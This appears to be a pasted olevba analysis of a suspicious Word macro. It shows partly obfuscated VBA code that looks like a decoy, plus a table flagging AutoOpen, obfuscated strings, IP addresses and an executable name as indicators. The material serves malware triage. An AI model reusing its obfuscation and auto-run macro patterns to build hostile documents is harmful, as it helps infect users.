  829. jiTGOr8bSJ1w ik3TIXZPVw, PKhoGPtN
  830. On Error GoTo ezoXNyHsfBxbG
  831.     a = 84 / 0
  832.   On Error GoTo 0
  833.  
  834. KdJjrVq24K7LM:
  835.   Exit Sub
  836. ezoXNyHsfBxbG:
  837.   WdkPbbVCe2B8 ("fd6AjxTdH")
  838. Resume KdJjrVq24K7LM
  839. End Sub
  840. Public Sub WriteEndNote(ByRef iFileNum As Integer, ByVal sEndLine As String, ByRef aVarArray() As VARTYPE, ByVal iVarCounter As Integer)
  841. '#-------------------------------------------------------------#
  842. ' AUTHOR:       John A. Griffiths
  843. ' CREATED:      4-Nov-1998
  844. ' DESCRIPTION:
  845. '
  846. '
  847. ' PARAMETERS:
  848. '   iFileNum integer:
  849. '   sEndLine string:
  850. '   aVarArray() vartype:
  851. '   iVarCounter integer:
  852. '
  853. ' CHANGE HISTORY:
  854. '   08-Mar-2000  John A. Griffiths (code update)
  855. '#-------------------------------------------------------------#
  856.    Dim iCnt As Integer
  857.     Dim bList As Boolean
  858.  
  859.  
  860.     If (iVarCounter > 0) Then
  861.         bList = False 'initialise checking flag
  862.        For iCnt = 1 To iVarCounter
  863.             'if any variables are not used, set bList to TRUE
  864.            If aVarArray(iCnt).Used = False Then bList = True
  865.         Next
  866.  
  867.         'if any variables were not used, print NOT USED text at end of procedure
  868.        If bList = True Then
  869.             Print #iFileNum, ""
  870.             Print #iFileNum, cCOMMENTS
  871.             Print #iFileNum, "' VARIABLES NOT USED:"
  872.  
  873.             'for every variable not used, write a line to the source code file
  874.            For iCnt = 1 To iVarCounter
  875.                 If aVarArray(iCnt).Used = False Then
  876.                     Print #iFileNum, cSPC & aVarArray(iCnt).Name & " as " & LCase(aVarArray(iCnt).Type) '& ""
  877.                End If
  878.             Next
  879.             Print #iFileNum, cCOMMENTS
  880.         End If
  881.     End If
  882.  
  883.     'print last line to file (usually "End Sub")
  884.    Print #iFileNum, sEndLine
  885. End Sub
  886.  
  887. Sub InitStyles()
  888. '#-------------------------------------------------------------#
  889. ' AUTHOR:    John Griffiths
  890. ' CREATED:   04-Jun-2000
  891. ' DESCRIPTION:
  892. '
  893. '
  894. ' PARAMETERS:
  895. '   None
  896. '
  897. ' CHANGE HISTORY:
  898. '   04-Jun-2000  John Griffiths (code update)
  899. '#-------------------------------------------------------------#
  900.    Dim lI As Long
  901.  
  902.  
  903.     AddStyle "Default Style", "", Format(Date, cDFORMAT), Format(Date, cDFORMAT) & "  "
  904.     AddStyle "JAG - code update", "John Griffiths", Format(Date, cDFORMAT), Format(Date, cDFORMAT) & "  John Griffiths (code update)"
  905.     AddStyle "JAG - new program style", "John Griffiths", Format(Date, cDFORMAT), Format(Date, cDFORMAT) & "  John Griffiths (initial release)"
  906.  
  907.     For lI = LBound(garStyles) To UBound(garStyles)
  908.         frmMain.lstStyle.AddItem garStyles(lI).Name
  909.     Next
  910. End Sub
  911.  
  912. Sub AddStyle(sName As String, sAuthor As String, sCreated As String, sHistory As String)
  913. '#-------------------------------------------------------------#
  914. ' AUTHOR:    John Griffiths
  915. ' CREATED:   04-Jun-2000
  916. ' DESCRIPTION:
  917. '
  918. '
  919. ' PARAMETERS:
  920. '   sName string:
  921. '   sAuthor string:
  922. '   sCreated string:
  923. '   sHistory string:
  924. '
  925. ' CHANGE HISTORY:
  926. '   04-Jun-2000  John Griffiths (code update)
  927. '#-------------------------------------------------------------#
  928.    Dim lLength As Long
  929.     Dim lCell As Long
  930.     Dim bNoSize As Boolean
  931.  
  932.     On Error GoTo ArrayEmpty
  933.  
  934.  
  935.     bNoSize = False
  936.  
  937.     lLength = UBound(garStyles)
  938.  
  939.     If (bNoSize = False) Then
  940.         'increase array size by one, preserving previous cells
  941.        ReDim Preserve garStyles(lLength + 1)
  942.     End If
  943.  
  944.     lCell = UBound(garStyles)
  945.  
  946.     garStyles(lCell).Name = Trim(sName)
  947.     garStyles(lCell).Author = Trim(sAuthor)
  948.     garStyles(lCell).Created = Trim(sCreated)
  949.     garStyles(lCell).History = Trim(sHistory)
  950.  
  951.     Exit Sub
  952.  
  953.  
  954. ArrayEmpty:
  955.     ReDim garStyles(0) 'initialise array by one
  956.    bNoSize = True 'don't resize after this
  957.  
  958.     Resume Next
  959. End Sub
  960.  
  961. -------------------------------------------------------------------------------
  962. VBA MACRO Module4.bas
  963. in file: editdata.mso - OLE stream: u'VBA/Module4'
  964. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  965. (empty macro)
  966. +------------+----------------------+-----------------------------------------+
  967. | Type       | Keyword              | Description                             |
  968. +------------+----------------------+-----------------------------------------+
  969. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  970. | Suspicious | Open                 | May open a file                         |
  971. | Suspicious | CreateObject         | May create an OLE object                |
  972. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  973. |            |                      | function calls                          |
  974. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  975. |            |                      | strings                                 |
  976. | Suspicious | SaveToFile           | May create a text file                  |
  977. | Suspicious | Write                | May write to a file (if combined with   |
  978. |            |                      | Open)                                   |
  979. | Suspicious | Put                  | May write to a file (if combined with   |
  980. |            |                      | Open)                                   |
  981. | Suspicious | Output               | May write to a file (if combined with   |
  982. |            |                      | Open)                                   |
  983. | Suspicious | Print #              | May write to a file (if combined with   |
  984. |            |                      | Open)                                   |
  985. | Suspicious | Open                 | May open a file (obfuscation: VBA       |
  986. |            |                      | expression)                             |
  987. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  988. |            |                      | may be used to obfuscate strings        |
  989. |            |                      | (option --decode to see all)            |
  990. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  991. |            | Strings              | may be used to obfuscate strings        |
  992. |            |                      | (option --decode to see all)            |
  993. | IOC        | 130.100.232.31       | IPv4 address                            |
  994. | IOC        | 10.0.1.1             | IPv4 address                            |
  995. | IOC        | 10.0.2.1             | IPv4 address                            |
  996. | IOC        | 10.0.3.1             | IPv4 address                            |
  997. | IOC        | 10.0.4.1             | IPv4 address                            |
  998. | IOC        | 130.100.232.5        | IPv4 address                            |
  999. | IOC        | 130.100.232.7        | IPv4 address                            |
  1000. | IOC        | wakamakafo.exe       | Executable file name (obfuscation: VBA  |
  1001. |            |                      | expression)                             |
  1002. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement